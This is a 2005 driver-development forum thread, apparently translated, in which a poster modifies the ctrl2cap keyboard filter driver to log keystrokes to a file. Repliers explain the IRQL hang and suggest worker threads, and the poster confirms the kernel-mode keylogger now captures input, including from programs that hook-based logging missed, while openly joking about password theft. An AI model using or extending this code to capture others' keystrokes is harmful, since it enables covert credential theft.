Views: 1954  Replies: 9

Why does the machine hang as soon as I call ZwCreateFile?

I modified the Ctrl2capReadComplete function in ctrl2cap as follows:

NTSTATUS Ctrl2capReadComplete( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context )
{
    PIO_STACK_LOCATION   IrpSp;
    PKEYBOARD_INPUT_DATA KeyData;
    int                  numKeys, i;

    // Added by me: initialization.
    // (The post originally declared FileHandle and IoStatusBlock as NULL
    //  pointers and passed them straight to ZwCreateFile; they are storage
    //  that ZwCreateFile writes to, so they must be real variables.)
    HANDLE               FileHandle;
    NTSTATUS             ntStatus;
    OBJECT_ATTRIBUTES    ObjectAttributes;
    IO_STATUS_BLOCK      IoStatusBlock;
    UNICODE_STRING       UniFileName;
    char*                Buffer = "t";       // not used yet
    int                  Length = 0;         // not used yet
    PCWSTR               FileName = L"\\??\\d:\\readme.dat";

    //
    // Request completed - look at the result.
    //
    IrpSp = IoGetCurrentIrpStackLocation( Irp );

    if( NT_SUCCESS( Irp->IoStatus.Status ) ) {

        //
        // Do caps-lock down and caps-lock up. Note that
        // just frobbing the MakeCode handles both the up-key
        // and down-key cases since the up/down information is specified
        // separately in the Flags field of the keyboard input data
        // (0 means key-down, 1 means key-up).
        //
        KeyData = Irp->AssociatedIrp.SystemBuffer;
        numKeys = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);

        for( i = 0; i < numKeys; i++ ) {

            // ctrl2cap's DbgPrint macro takes a parenthesized argument list
            DbgPrint(("ScanCode: %x ", KeyData[i].MakeCode ));
            DbgPrint(("%s\n", KeyData[i].Flags ? "Up" : "Down" ));

            if( KeyData[i].MakeCode == CAPS_LOCK) {

                KeyData[i].MakeCode = LCONTROL;

                // Added by me; this is where it goes wrong:
                RtlInitUnicodeString( &UniFileName, FileName );
                InitializeObjectAttributes( &ObjectAttributes, &UniFileName,
                                            OBJ_CASE_INSENSITIVE, NULL, NULL );
                ntStatus = ZwCreateFile( &FileHandle,
                                         GENERIC_WRITE | SYNCHRONIZE | GENERIC_READ,
                                         &ObjectAttributes,
                                         &IoStatusBlock,
                                         0,
                                         FILE_ATTRIBUTE_NORMAL,
                                         FILE_SHARE_DELETE,
                                         FILE_OPEN_IF,
                                         FILE_SYNCHRONOUS_IO_NONALERT,
                                         NULL,
                                         0 );
            }
        }
    }

    //
    // Mark the Irp pending if required
    //
    if( Irp->PendingReturned ) {

        IoMarkIrpPending( Irp );
    }
    return Irp->IoStatus.Status;
}

Why does the machine hang as soon as I press Caps Lock? Can ZwCreateFile not be used here? Or am I calling ZwCreateFile the wrong way? Experts, please advise!!!
Reply #1
Posted: 2005-06-15 09:02
It is probably an IRQL problem; check what the current IRQL is.
Reply #2
Posted: 2005-06-15 09:30
It is definitely an IRQL problem: the completion routine runs at DISPATCH_LEVEL, while
ZwCreateFile requires IRQL PASSIVE_LEVEL.
Reply #3
Posted: 2005-06-15 10:01
Thanks to both of you!!!
I guessed it might be this too, but I don't know how to solve it??? Please advise!!!
Reply #4
Posted: 2005-06-15 10:49
> Thanks to both of you!!!

Haha, you want to build a password-stealing trojan, don't you? :D I don't recommend doing that. :P As for the specific problem: first put the keyboard data into a buffer, then create a WorkItem so that a system worker thread does the job for you once the system is down at IRQL PASSIVE_LEVEL.
Reply #5
Posted: 2005-06-15 11:35
Hehe,
you can also use PsCreateSystemThread to create a system thread to do this.
Reply #6
Posted: 2005-06-15 16:51
Brother bmyyyud, I am just quite interested in hacking software; it is very interesting to study. I once wrote a hook-based keyboard logging tool, but recently found that it does not work with some programs, so I wanted to do it in a driver, though I don't know yet whether it will work. I have only just started with driver programming, please give me your advice! :D
Reply #7
Posted: 2005-06-15 17:23
Hehe, right.
Reply #8
Posted: 2005-06-15 22:22
Heh, a kernel mode key logger was my first driver program,
also modified from cap2ctrl. ;)
Reply #9
Posted: 2005-06-16 08:56
:P Hello brothers! Thanks to everyone for the advice!
The keyboard can now be logged, including programs for which hook-based logging did not work before. :D But why does getting the current process name always return csrss.exe? The code is as follows (taken from filemon):

ULONG FilemonGetProcessNameOffset()
{
    PEPROCESS curproc;
    int       i;

    curproc = PsGetCurrentProcess();

    //
    // Scan for 12KB, hoping the KPEB never grows that big!
    //
    for( i = 0; i < 3*PAGE_SIZE; i++ ) {

        if( !strncmp( SYSNAME, (PCHAR) curproc + i, strlen(SYSNAME) )) {

            return i;
        }
    }

    //
    // Name not found - oh, well
    //
    return 0;
}

PCHAR FilemonGetProcess( PCHAR Name )
{
#if GETPROCESS
    PEPROCESS curproc;
    char      *nameptr;
    ULONG     i;
    KIRQL     oldirql;

    //
    // We only do this if we determined the process name offset
    //
    if( ProcessNameOffset ) {

        //
        // Get a pointer to the current process block
        //
        curproc = PsGetCurrentProcess();
        //curproc = IoGetCurrentProcess();

        //
        // Dig into it to extract the name
        //
        nameptr = (PCHAR) curproc + ProcessNameOffset;
        //DbgPrint(("Ctrl2cap: nameptr:%s!\n",nameptr));

        strncpy( Name, nameptr, NT_PROCNAMELEN );

        //
        // Terminate in case process name overflowed
        //
        Name[NT_PROCNAMELEN] = 0;
        //DbgPrint(("Ctrl2cap: Name:%s &&&!\n",Name));

        return Name;

    } else {

        strcpy( Name, "???" );
        return Name;
    }
#else
    //
    // We're not getting names, so just return something
    //
    strcpy( Name, "??" );
    return Name;
#endif
}

I checked with DbgView: no matter which program I type in, the Name returned here is always csrss.exe, which is really strange!!! :( Please keep advising!!!